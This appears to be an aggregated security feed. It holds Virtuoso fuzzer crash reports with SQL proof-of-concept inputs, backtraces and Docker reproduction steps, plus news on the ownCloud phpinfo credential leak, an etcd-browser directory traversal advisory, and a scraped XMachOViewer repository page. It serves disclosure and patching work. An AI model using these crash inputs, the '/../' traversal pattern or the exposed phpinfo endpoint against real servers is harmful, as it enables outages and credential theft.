An issue in the box_col_len function in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.

The PoC is generated by my DBMS fuzzer.

    CREATE TABLE v0 ( v1 nvarchar ) ; 
     INSERT INTO v0 VALUES ( 1 ) ; 
     INSERT INTO v0 SELECT MAX ( DISTINCT v1 ) FROM v0 ; 
     INSERT INTO v0 SELECT v1 FROM v0 WHERE ( SELECT ( SELECT v1 FROM v0 ) ) ; 
    

backtrace:

    #0 0x86df90 (box_col_len+0x90)
    #1 0x88c0af (key_vec_insert+0x9df)
    #2 0x7b679b (insert_node_run+0x8fb)
    #3 0x7b6b1c (insert_node_input+0x11c)
    #4 0x7af05e (qn_input+0x3ce)
    #5 0x7af78f (qn_ts_send_output+0x23f)
    #6 0x7b509e (table_source_input+0x16ee)
    #7 0x7af05e (qn_input+0x3ce)
    #8 0x7af4c6 (qn_send_output+0x236)
    #9 0x8214bd (set_ctr_vec_input+0x99d)
    #10 0x7af05e (qn_input+0x3ce)
    #11 0x7c1be9 (qr_dml_array_exec+0x839)
    #12 0x7ce602 (sf_sql_execute+0x15d2)
    #13 0x7cecde (sf_sql_execute_w+0x17e)
    #14 0x7d799d (sf_sql_execute_wrapper+0x3d)
    #15 0xe214bc (future_wrapper+0x3fc)
    #16 0xe28dbe (_thread_boot+0x11e)
    #17 0x7ff3d19ba609 (start_thread+0xd9)
    #18 0x7ff3d178a133 (clone+0x43)
    

ways to reproduce (write poc to the file /tmp/test.sql first):

    # remove the old one
    docker container rm virtdb_test -f
    # start virtuoso through docker
    docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
    # wait the server starting
    sleep 10
    # check whether the simple query works
    echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
    # run the poc
    cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba

CVE-2023-48950: Fuzzer: Virtuoso 7.2.11 crashed at box_col_len · Issue #1174 · openlink/virtuoso-opensource

An issue in the box_equal function in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE v0 ( v1 SMALLINT CHECK ( CONTAINS ( 'del' , 'reabbreviating' , 'diamonds' ) ) ) ; 

backtrace:

#0 0xdeab6a (box\_equal+0xba)
#1 0x773df3 (sqlo\_cname\_ot+0x53)
#2 0x6e0161 (sqlo\_df+0x461)
#3 0x6e0d6c (sqlo\_df+0x106c)
#4 0x6e067f (sqlo\_df+0x97f)
#5 0x70ea77 (sqlo\_top\_2+0x267)
#6 0x70e4a5 (sqlo\_top\_1+0x135)
#7 0x70ffa6 (sqlo\_top\_select+0x156)
#8 0x6b9b6f (sql\_stmt\_comp+0x8bf)
#9 0x6bc9d2 (sql\_compile\_1+0x1a62)
#10 0x4e213f (ddl\_table\_check\_constraints\_define\_triggers+0x1af)
#11 0x4e462d (ddl\_table\_constraints+0xd0d)
#12 0x4e5331 (sql\_ddl\_node\_input\_1+0xbc1)
#13 0x4e57ee (sql\_ddl\_node\_input+0x10e)
#14 0x7bcb0b (ddl\_node\_input\_1+0x19b)
#15 0x7bd1e7 (qn\_without\_ac\_at+0xc7)
#16 0x7af05e (qn\_input+0x3ce)
#17 0x7c1be9 (qr\_dml\_array\_exec+0x839)
#18 0x7ce602 (sf\_sql\_execute+0x15d2)
#19 0x7cecde (sf\_sql\_execute\_w+0x17e)
#20 0x7d799d (sf\_sql\_execute\_wrapper+0x3d)
#21 0xe214bc (future\_wrapper+0x3fc)
#22 0xe28dbe (\_thread\_boot+0x11e)
#23 0x7f4182517609 (start\_thread+0xd9)
#24 0x7f41822e7133 (clone+0x43)

ways to reproduce (write poc to the file /tmp/test.sql first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
cat /tmp/test.sql | docker exec -i virtdb\_test isql 1111 dba

CVE-2023-48951: Fuzzer: Virtuoso 7.2.11 crashed at box_equal · Issue #1177 · openlink/virtuoso-opensource

An issue in the box_add function in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE v0 ( v1 FLOAT UNIQUE , v2 INT ) ;
 INSERT INTO v0 VALUES ( NULL , 57 ) ;
 INSERT INTO v0 VALUES ( \-1 , ( SELECT 60 , v2 FROM v0 WHERE v2 \= \-1 ) ) ;
 UPDATE v0 SET v1 \= ( CASE WHEN v2 \* v1 THEN 76 ELSE ( SELECT v2 FROM v0 WHERE v1 \= \-2147483648 / CASE WHEN v2 \= ( SELECT v1 FROM v0 WHERE ( CASE WHEN v2 \= v2 AND v2 \= v2 AND v2 THEN v2 + v1 \* \-128 + 48100742.000000 END ) IN ( SELECT v1 FROM v0 WHERE v2 BETWEEN 'x' AND 'x' OR ( CASE WHEN v2 \= 16 THEN 46 ELSE v1 + ( 69175744.000000 , 10962973.000000 ) / 36 + 5 END ) GROUP BY 'x' ) ORDER BY v2 / 45 DESC ) THEN 32232158.000000 END ) END ) ;

backtrace:

#0 0xc1e333 (box\_add+0x83)
#1 0x75e0ba (code\_vec\_run\_no\_catch+0xe5a)
#2 0x8966e5 (itc\_vec\_row\_check+0x8e5)
#3 0x617353 (itc\_page\_search+0xc13)
#4 0x61345f (itc\_search+0x84f)
#5 0x896de4 (itc\_vec\_next+0x364)
#6 0x7b2565 (ks\_start\_search+0xf75)
#7 0x7b434e (table\_source\_input+0x99e)
#8 0x7af05e (qn\_input+0x3ce)
#9 0x44c979 (chash\_fill\_input+0x589)
#10 0x5370af (hash\_fill\_node\_input+0xef)
#11 0x7af05e (qn\_input+0x3ce)
#12 0x7af4c6 (qn\_send\_output+0x236)
#13 0x8214bd (set\_ctr\_vec\_input+0x99d)
#14 0x7af05e (qn\_input+0x3ce)
#15 0x7c1be9 (qr\_dml\_array\_exec+0x839)
#16 0x7ce602 (sf\_sql\_execute+0x15d2)
#17 0x7cecde (sf\_sql\_execute\_w+0x17e)
#18 0x7d799d (sf\_sql\_execute\_wrapper+0x3d)
#19 0xe214bc (future\_wrapper+0x3fc)
#20 0xe28dbe (\_thread\_boot+0x11e)
#21 0x7f7e10239609 (start\_thread+0xd9)
#22 0x7f7e10009133 (clone+0x43)

ways to reproduce (write poc to the file /tmp/test.sql first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
cat /tmp/test.sql | docker exec -i virtdb\_test isql 1111 dba

CVE-2023-48949: Fuzzer: Virtuoso 7.2.11 crashed at box_add · Issue #1173 · openlink/virtuoso-opensource

An issue in the box_deserialize_reusing function in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE v0 ( v1 INT , v2 BIGINT PRIMARY KEY) ;
 INSERT INTO v0 VALUES ( 20 , \-1 ) ;
 SELECT v1 + 77 , v2 FROM v0 UNION SELECT v2 , CASE WHEN 92 THEN 86 ELSE ( ( 32433852.000000 , 70038895.000000 ) , ( 64572024.000000 , 4442219.000000 ) ) END FROM v0 ORDER BY v2 + \-1 \* 40 ;

backtrace:

#0 0x876418 (box\_deserialize\_reusing+0x38)
#1 0x87917e (sslr\_qst\_get+0x46e)
#2 0x81f2f6 (select\_node\_input\_vec+0x656)
#3 0x7ba667 (select\_node\_input+0xa7)
#4 0x7af05e (qn\_input+0x3ce)
#5 0x7af78f (qn\_ts\_send\_output+0x23f)
#6 0x7b509e (table\_source\_input+0x16ee)
#7 0x7af05e (qn\_input+0x3ce)
#8 0x7af4c6 (qn\_send\_output+0x236)
#9 0x7af05e (qn\_input+0x3ce)
#10 0x7af4c6 (qn\_send\_output+0x236)
#11 0x8214bd (set\_ctr\_vec\_input+0x99d)
#12 0x7af05e (qn\_input+0x3ce)
#13 0x7c084b (qr\_exec+0x11db)
#14 0x7ce1d6 (sf\_sql\_execute+0x11a6)
#15 0x7cecde (sf\_sql\_execute\_w+0x17e)
#16 0x7d799d (sf\_sql\_execute\_wrapper+0x3d)
#17 0xe214bc (future\_wrapper+0x3fc)
#18 0xe28dbe (\_thread\_boot+0x11e)
#19 0x7fca3837c609 (start\_thread+0xd9)
#20 0x7fca3814c133 (clone+0x43)

ways to reproduce (write poc to the file /tmp/test.sql first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
cat /tmp/test.sql | docker exec -i virtdb\_test isql 1111 dba

CVE-2023-48952: Fuzzer: Virtuoso 7.2.11 crashed at box_deserialize_reusing · Issue #1175 · openlink/virtuoso-opensource

An issue in the box_div function in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE v0 ( v1 INTEGER NOT NULL PRIMARY KEY ) ; 
  INSERT INTO v0 VALUES ( 95 ) ; 
  INSERT INTO v0 VALUES ( ( SELECT ( \-1 , \-1 ) \* ( 31 , 84 ) FROM v0 WHERE v1 BETWEEN 'x' AND 'x' OR EXISTS ( SELECT v1 FROM v0 WHERE v1 NOT IN ( SELECT 20 FROM v0 WHERE ( v1 \> 2147483647 AND v1 < 271514.000000 ) ) ) ) ) ; 
  INSERT INTO v0 SELECT v1 + v1 + v1 FROM v0 ORDER BY v1 ; 
  INSERT INTO v0 VALUES ( ( SELECT ( 34 , 16 ) \* ( 41 , \-128 ) FROM v0 WHERE v1 BETWEEN 'x' AND 'x' OR EXISTS ( SELECT v1 FROM v0 WHERE v1 + v1 \* 24 / 50820962.000000 \- 0 / 86183090.000000 IN ( SELECT DISTINCT v1 FROM v0 WHERE 'x' OR ( ( ( v1 / 0 ) ) \[ 35 \] ) \* 16 BETWEEN 'x' AND 'x' GROUP BY v1 , v1 ) ) ) ) ; 

backtrace:

#0 0xc210f3 (box\_div+0x83)
#1 0x754f4e (code\_vec\_run\_v+0x1c9e)
#2 0x7b86bb (end\_node\_input+0x13b)
#3 0x7af05e (qn\_input+0x3ce)
#4 0x7af78f (qn\_ts\_send\_output+0x23f)
#5 0x7b509e (table\_source\_input+0x16ee)
#6 0x7af05e (qn\_input+0x3ce)
#7 0x44c979 (chash\_fill\_input+0x589)
#8 0x5370af (hash\_fill\_node\_input+0xef)
#9 0x7af05e (qn\_input+0x3ce)
#10 0x7af4c6 (qn\_send\_output+0x236)
#11 0x8214bd (set\_ctr\_vec\_input+0x99d)
#12 0x7af05e (qn\_input+0x3ce)
#13 0x751d38 (subq\_next+0x258)
#14 0x8201a2 (ins\_vec\_subq+0x2a2)
#15 0x753c6b (code\_vec\_run\_v+0x9bb)
#16 0x7b8737 (end\_node\_input+0x1b7)
#17 0x7af05e (qn\_input+0x3ce)
#18 0x7c1be9 (qr\_dml\_array\_exec+0x839)
#19 0x7ce602 (sf\_sql\_execute+0x15d2)
#20 0x7cecde (sf\_sql\_execute\_w+0x17e)
#21 0x7d799d (sf\_sql\_execute\_wrapper+0x3d)
#22 0xe214bc (future\_wrapper+0x3fc)
#23 0xe28dbe (\_thread\_boot+0x11e)
#24 0x7ff8b497a609 (start\_thread+0xd9)
#25 0x7ff8b474a133 (clone+0x43)

ways to reproduce (write poc to the file /tmp/test.sql first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
cat /tmp/test.sql | docker exec -i virtdb\_test isql 1111 dba

CVE-2023-48948: Fuzzer: Virtuoso 7.2.11 crashed at box_div · Issue #1176 · openlink/virtuoso-opensource

A vulnerability in the file server and collaboration platform earned a 10 in severity on the CVSS, allowing access to admin passwords, mail server credentials, and license keys.

Source: John Williams RF via Alamy Stock Photo

Hackers are actively exploiting a critical flaw in the open source ownCloud platform that allows access to access admin passwords, mail server credentials, and license keys, exposing their enterprise to data breaches or other types of malicious activity.

The flaw, tracked as CVE-2023-49103 and disclosed by ownCloud on Nov. 21, earned the top score of 10 out of 10 on the CVSS severity rating due to its ease of exploitation. It arises from a flaw in the "graphapi" app used in ownCloud, a file server and collaboration platform that enables secure storage, sharing, and synchronization of commonly sensitive files.

Researchers from GreyNoise observed what they characterized as "mass exploitation" of the flaw in the wild starting as early as Nov. 25, with at least 40 unique IP addresses seen trying to exploit the flaw so far, according to the current data shown on its tracker.

Glenn Thorpe, senior director of security research and detection engineering at GreyNoise, characterized the initial exploitation observed by GreyNoise as attackers "pretty much spraying it across the Internet to see what hits," in an online discussion on Tuesday.

The Shadowserver Foundation also is tracking exploitation of the flaw, having observed more than 11,000 exposed instances, with most of those located in Germany, the US, France, and Russia.

The app affected by the flaw is present in ownCloud versions 0.2.0 to 0.3.0. "This app utilizes a third-party library that will reveal sensitive PHP environment configurations, including passwords and keys," Thorpe wrote in the post.

It's important to note that only by patching can those affected mitigate the issue, as even disabling the app does not entirely resolve it, according to GreyNoise. The flaw affects both containerized and non-containerized ownCloud instances, although Docker containers from before February 2023 are not vulnerable to the credential disclosure, the researchers noted.

Moreover, the vulnerability is just one of three that ownCloud revealed last week, all of which allow attackers to breach data in deployments of the platform, the researchers noted. The other two are an authentication bypass flaw tracked as CVE-2023-49105 and a critical flaw related to the oauth2 app tracked as CVE-2023-49104.

"Organizations using ownCloud should address these vulnerabilities immediately," GreyNoise recommended.

**Top CVSS Rating**

OwnCloud is used by nearly 1 million organizations worldwide to manage and share data through a self-hosted platform, replacing the use of online services such as Dropbox to share files throughout an organization. Theoretically this makes enterprise file transfers more secure than sending them over a public cloud, except of course if the deployment of ownCloud is being exploited.

That's the current case of the critical flaw in graphapi, which relies on a third-party library that provides a URL which, when accessed, reveals the configuration details of the PHP environment, according to ownCloud.

These details include all the environment variables of the Web server, which in containerized deployments "may include sensitive data such as the ownCloud admin password, mail server credentials, and license key," according to ownCloud.

In its fix, ownCloud deleted the file owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php and disabled the phpinfo function docker-containers to remedy the flaw. The company also plans to harden various aspects in future core releases to mitigate similar vulnerabilities.

In addition to applying the fix, ownCloud also recommended that companies change the following secrets in their deployments: ownCloud admin password, mail server credentials, database credentials, and object-Store/S3 access-key.

**Other Flaws to Consider**

While not quite as severe as the graphapi flaw, the two other flaws recently discovered by ownCloud also are rated as critical and deserve attention, the company said.

CVE-2023-49105, rated as 9.8 on the CVSS, allows for attackers to access, modify, or delete any file without authentication if the username of the victim is known and the victim has no signing key configured, which is the platform's default configuration.

The flaw affects the ownCloud "core" app versions 10.6.0 – 10.13.0 and can be fixed by denying the use of pre-signed URLs if no signing key is configured for the owner of the files.

CVE-2023-49104, meanwhile, affects the ownCloud oauth2 app versions before 0.6.1 and allows someone to pass in a specially crafted redirect URL that bypasses the validation code. This, in turn, allows the attacker to redirect callbacks to an attacker-controlled top-level domain.

The flaw is rated as 9 on the CVSS and can be mitigated by hardening the validation code in the oauth2 app. A workaround that also fixes the flaw is to disable the "Allow Subdomains" option, according to ownCloud.

**About the Author(s)**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Patch Now: Attackers Pummel Critical, Easy-to-Exploit OwnCloud Flaw

By Deeba Ahmed
The vulnerability is tracked as CVE-2023-49103 and declared critical with a CVSS v3 Base Score 10.
This is a post from HackRead.com Read the original post: OwnCloud “graphapi” App Vulnerability Exposes Sensitive Data

OwnCloud has fixed the issue in version 10.9.01 but urges customers to change their OwnCloud admin password, database and mail server credentials.

A critical vulnerability has been identified in the OwnCloud “graphapi” app, enabling threat actors to gain access to sensitive information in containerized deployments. This includes admin passwords, mail server credentials, and license keys.

According to a security advisory released by OwnCloud, the vulnerability affects versions 0.2.0 to 0.3.0. The company publicly disclosed this issue on 21 November 2023.

For your information, OwnCloud is a file server/collaboration platform offering safe storage, sharing, and synchronization of sensitive files.

The vulnerability is tracked as CVE-2023-49103 and declared critical with a CVSS v3 Base Score 10. It was assigned the identifier oC-SA-2023-0011. 

On the other hand, data security firm GreyNoise has observed mass exploitation of this flaw in the wild starting from 25 November, raising serious concerns within the cybersecurity community.

What happens is that attackers can exploit this vulnerability to access a URL that can reveal the configuration details of the PHP environment (phpinfo). 

It is worth noting that the vulnerability was detected in the OwnCloud server and caused by a third-party library, which provides the URL, that reveals the configuration details, including all the environment variables like mail server credentials or admin passwords of the webserver. 

OwnCloud has fixed the issue in version 10.9.01. The company noted that Docker-Containers from before February 2023 aren’t vulnerable to credential exposure.

Nevertheless, the company suggests users must act promptly to mitigate the threat. This involves deleting the file OwnCloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php and disabling the phpinfo function in Docker containers. 

The advisory explained that simply disabling the graphapi app cannot eliminate the issue because phpinfo can expose sensitive configuration data that attackers can exploit to collect system-related information. This means even if OwnCloud isn’t running in a containerized environment, the threat will persist.

Therefore, users should change their OwnCloud admin password, mail server credentials, database credentials, and Object-Store/S3 access key. These steps will help mitigate the risk of attackers exploiting the vulnerability to access sensitive information.

Casey Ellis, Founder and Chief Strategy Officer at San Francisco, Calif.-based crowdsourced cybersecurity firm Bugcrowd shared a comment with Hackread on the disclosure, calling it “concerning.” 

“This one is concerning because OwnCloud is the type of software that home users and small businesses tend to set up and then forget,” explained Ellis. “The combination of the impact of this vulnerability and the type of personal/valuable data stored in ownCloud instances provides a wide variety of options for attackers looking to exploit it – I’d be very surprised if we don’t start hearing about ransomed ownCloud instances in the coming days.”

****_RELATED ARTICLES_****

1.  **Google Workspace Vulnerable to Takeover**
2.  **Outdated Wallets Threatening Billions in Crypto Assets**
3.  **OracleIV DDoS Botnet Malware Targets Docker Engine API Instances**
4.  **Domain Squatting, Brand Hijacking: A Silent Threat to Digital Enterprises**
5.  **Kinsing Crypto Malware Targets Linux Systems via Apache ActiveMQ Flaw**

OwnCloud “graphapi” App Vulnerability Exposes Sensitive Data

etcd-browser version 87ae63d75260 suffers from a directory traversal vulnerability.

An issue was discovered in server.js in etcd-browser 87ae63d75260. By  
supplying a /../../../ Directory Traversal input to the URL's GET  
request while connecting to the remote server port specified during  
setup, an attacker can retrieve local operating system files from the  
remote system.

------------------------------------------

[Vulnerability Type]  
Directory Traversal

------------------------------------------

[Vendor of Product]  
https://hub.docker.com/r/buddho/etcd-browser

------------------------------------------

[Affected Product Code Base]  
etcd-browser - Unknown

------------------------------------------

[Affected Component]  
the server.js file does not validate the path for files.

------------------------------------------

[Attack Type]  
Remote

------------------------------------------

[Impact Information Disclosure]  
true

------------------------------------------

[CVE Impact Other]  
Allow for a remote arbitrary user to obtain local operating system files

------------------------------------------

[Attack Vectors]  
The attacker must supply a /../../ technique to the server application  
running on the remote port specified during setup

------------------------------------------

[Reference]  
https://hub.docker.com/r/buddho/etcd-browser  
https://hub.docker.com/r/buddho/etcd-browser/tags

------------------------------------------

[Discoverer]  
Kevin Randall

etcd-browser 87ae63d75260 Directory Traversal

A dylib injection vulnerability in XMachOViewer 0.04 allows attackers to compromise integrity. By exploiting this, unauthorized code can be injected into the product's processes, potentially leading to remote control and unauthorized access to sensitive user data.

Skip to content

Sign up

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    Explore
    
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   For
    
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    By Solution
    
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    Resources
    
    *   Learning Pathways
    *   White papers, Ebooks, Webinars
    *   Customer Stories
    *   Partners
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    Repositories
    
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

We read every piece of feedback, and take your input very seriously.

Include my email address so I can be contacted

**Saved searches****Use saved searches to filter your results more quickly**

Sign in

Sign up

horsicq / **XMachOViewer** Public

*   Notifications
*   Fork 50
*   Star 635
    

XMachOViewer is a Mach-O viewer for Windows, Linux and MacOS

ntinfo.biz

**License**

MIT license

635 stars 50 forks Activity

Star

Notifications

*   Code
*   Issues 2
*   Pull requests
*   Discussions
*   Actions
*   Projects
*   Security
*   Insights

Additional navigation options

master

Switch branches/tags

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **5** tags

Code

*   Clone
    
    Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Git stats**

*   **12,688** commits

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

.github

Create docker-image.yml

May 24, 2021 11:42

Controls @ bde01e3

Update module: Controls 2023-11-28

November 28, 2023 00:21

Detect-It-Easy @ 361698e

Update module: Detect-It-Easy 2023-11-28

November 28, 2023 00:23

FormatDialogs @ de15ef2

Update module: FormatDialogs 2023-11-27

November 27, 2023 01:47

FormatWidgets @ e36380f

Update module: FormatWidgets 2023-11-28

November 28, 2023 00:22

Formats @ c3ce687

Update module: Formats 2023-11-28

November 28, 2023 00:22

LINUX

Fix: 2022-08-08

August 8, 2022 18:47

SpecAbstract @ 9282c42

Fix: 2023-10-04

October 4, 2023 19:31

StaticScan @ 723090f

Fix: 2023-05-23

May 23, 2023 20:34

XAboutWidget @ 8cc8adb

Fix: 2023-09-05

September 5, 2023 00:12

XArchive @ 6d85719

Update module: XArchive 2023-11-12

November 12, 2023 16:19

XCapstone @ 8c16344

Update module: XCapstone 2023-11-28

November 28, 2023 00:22

XCppfilt @ d9c2be9

Update module: XCppfilt 2023-10-18

October 18, 2023 18:34

XDEX @ 71db4b8

Fix: 2023-07-31

July 31, 2023 19:05

XDataConvertorWidget @ a776bd1

Update module: XDataConvertorWidget 2023-11-28

November 28, 2023 03:49

XDecompiler @ 3391a28

Fix: 2023-08-21

August 21, 2023 18:48

XDemangle @ c8c3172

Update module: XDemangle 2023-11-24

November 24, 2023 00:25

XDemangleWidget @ af0d823

Fix: 2023-09-29

September 29, 2023 17:36

XDisasm @ 7767f42

Fix: 2023-04-10

April 10, 2023 01:26

XDisasmView @ b81ac59

Update module: XDisasmView 2023-11-28

November 28, 2023 00:22

XDynStructs @ d67af94

Fix: 2023-03-11

March 11, 2023 22:35

XDynStructsEngine @ f90de40

Fix: 2023-03-13

March 13, 2023 05:40

XDynStructsWidget @ 2243d2a

Fix: 2023-09-11

September 11, 2023 00:08

XEntropyWidget @ 57dc917

Fix: 2023-09-25

September 25, 2023 19:09

XExtractor @ 040530e

Fix: 2023-08-04

August 4, 2023 00:19

XExtractorWidget @ 989bda3

Fix: 2023-09-25

September 25, 2023 18:34

XFileInfo @ e1535c6

Fix: 2023-09-25

September 25, 2023 18:47

XGithub @ e66b9dc

Fix: 2023-03-15

March 15, 2023 06:09

XHashWidget @ 86c77b4

Fix: 2023-09-25

September 25, 2023 19:12

XHexEdit @ 04d9067

Fix: 2023-07-27

July 27, 2023 00:30

XHexView @ 9a4b88a

Update module: XHexView 2023-11-28

November 28, 2023 00:22

XInfoDB @ df88dd6

Update module: XInfoDB 2023-11-28

November 28, 2023 00:22

XLLVMDemangler @ 9f9ca2e

Fix: 2023-03-11

March 11, 2023 23:13

XMemoryMapWidget @ ce52b89

Update module: XMemoryMapWidget 2023-11-10

November 10, 2023 00:21

XOnlineTools @ 834247c

Fix: 2023-09-25

September 25, 2023 18:44

XOptions @ 4a25fe9

Update module: XOptions 2023-11-28

November 28, 2023 00:22

XPDF @ 74f8435

Fix: 2023-08-11

August 11, 2023 00:39

XQwt @ 0a1a424

Fix: 2023-07-08

July 8, 2023 00:45

XShortcuts @ 5dc4922

Update module: XShortcuts 2023-11-25

November 25, 2023 12:11

XStyles @ 62e634b

Fix: 2023-10-02

October 2, 2023 16:22

XSymbolsWidget @ d8fe2aa

Fix: 2023-09-05

September 5, 2023 00:15

XTranslation @ a16af1d

Update module: XTranslation 2023-11-20

November 20, 2023 00:21

XUpdate @ 5c69107

Fix: 2023-04-10

April 10, 2023 21:46

XVisualizationWidget @ 1d78c38

Fix: 2023-09-25

September 25, 2023 18:38

XYara @ cb9b124

Update module: XYara 2023-10-23

October 23, 2023 18:32

archive\_widget @ 289ba6b

Fix: 2023-09-07

September 7, 2023 14:32

build\_libs

Fix: 2023-05-22

May 22, 2023 18:12

build\_tools @ 14c6d42

Update module: build\_tools 2023-11-02

November 2, 2023 18:29

die\_script @ 490a8cb

Update module: die\_script 2023-11-26

November 26, 2023 00:22

die\_widget @ 2cc7014

Update module: die\_widget 2023-11-23

November 23, 2023 08:52

docs

Format RUN.md

October 13, 2023 02:57

gui\_source

Fix: 2023-09-05

September 5, 2023 00:09

hex\_templates @ dff5b39

Fix: 2023-03-11

March 11, 2023 23:02

icons

Fix: 2022-08-08

August 8, 2022 18:47

images/thanks

Fix: 2023-09-08

September 8, 2023 00:50

mascots

Fix: 2021-05-05

May 5, 2021 18:10

nfd\_widget @ 0258f38

Update module: nfd\_widget 2023-10-17

October 17, 2023 18:52

signatures @ b8f9793

Fix: 2023-03-11

March 11, 2023 22:35

yara\_widget @ 5180c67

Update module: yara\_widget 2023-10-18

October 18, 2023 18:35

.gitmodules

Add new module

November 26, 2023 00:08

CMakeLists.txt

Fix: 2023-05-22

May 22, 2023 18:12

Dockerfile

Fix: 2021-05-24

May 24, 2021 12:04

LICENSE

Fix: 2023-02-18

February 18, 2023 00:08

README.md

Update README.md

October 16, 2023 22:03

THANKS.md

Fix: 2023-09-08

September 8, 2023 00:50

build.pri

Fix: 2023-03-14

March 14, 2023 08:11

build\_dpkg.sh

Fix: 2022-08-12

August 12, 2022 16:39

build\_mac.sh

Fix: 2022-08-05

August 5, 2022 15:28

build\_msvc\_win32.bat

Fix: 2021-09-28

September 28, 2021 19:06

build\_msvc\_win64.bat

Fix: 2021-09-28

September 28, 2021 19:06

build\_msvc\_winxp.bat

Fix: 2021-09-28

September 28, 2021 19:06

build\_win32.bat

Fix: 2021-05-21

May 21, 2021 17:58

build\_win64.bat

Fix: 2021-05-21

May 21, 2021 17:58

build\_win\_generic.cmd

Fix: 2022-08-05

August 5, 2022 15:28

changelog.txt

Fix: 2022-07-19

July 19, 2022 18:10

configure

Fix: 2022-08-02

August 2, 2022 16:30

configure.ac

Fix: 2022-08-02

August 2, 2022 16:30

create\_appimage.sh

Fix: 2022-08-05

August 5, 2022 18:12

global.h

Fix: 2023-04-02

April 2, 2023 13:55

install.iss

Fix: 2022-05-24

May 24, 2022 18:22

install.sh

Fix: 2022-08-05

August 5, 2022 15:28

release\_version.txt

Fix: 2022-07-19

July 19, 2022 18:10

xmachoviewer\_source.pro

Fix: 2022-01-24

January 24, 2022 18:44

MachO file viewer/editor for Windows, Linux and macOS. Features Downloads Building Usage Changelog You can help with translation! Special Thanks

**README.md**

   

**MachO file viewer/editor for Windows, Linux and macOS.****Features**

*   Heuristic scan
*   String viewer
*   Hex viewer
*   Disasm viewer(x86/64,ARM,PPC,m68k)
*   Entropy viewer
*   Hash viewer
*   Crypto search
*   Name demangling

**Downloads**

XMachOViewer can be downloaded from the releases page.

**Building**

Build instructions can be found in BUILD.md.

**Usage**

Instructions to use xmachoviewer - The GUI version can be found in RUN.md.

**Changelog**

Changelog can be found in changelog.txt.

**You can help with translation!**

Follow This link.

       

**Special Thanks**

*   PELock Software Protection & Reverse Engineering

**About**

XMachOViewer is a Mach-O viewer for Windows, Linux and MacOS

ntinfo.biz

**Topics**

reverse-engineering macho hacktoberfest macho-parser osx-application machoexplorer machoview macho-loader macho64 hacktoberfest2023

**Resources**

Readme

**License**

MIT license

Activity

**Stars**

**635** stars

**Watchers**

**13** watching

**Forks**

**50** forks

Report repository

**Releases 5**

0.04 Latest

Aug 6, 2022

\+ 4 releases

**Sponsor this project**

Learn more about GitHub Sponsors

**Packages**

No packages published  

**Contributors 3**

*    **horsicq** Hors
*    **mdhvg** Madhav Goyal
*    **omimakhare** OMKAR MAKHARE

**Languages**

*   C++ 37.5%
*   QMake 33.1%
*   Batchfile 10.0%
*   Shell 8.0%
*   CMake 5.1%
*   M4 2.0%
*   Other 4.3%

CVE-2023-49313: GitHub - horsicq/XMachOViewer: XMachOViewer is a Mach-O viewer for Windows, Linux and MacOS

A vulnerability in the ownCloud file sharing app could lead to the exposure of sensitive credentials like admin passwords.

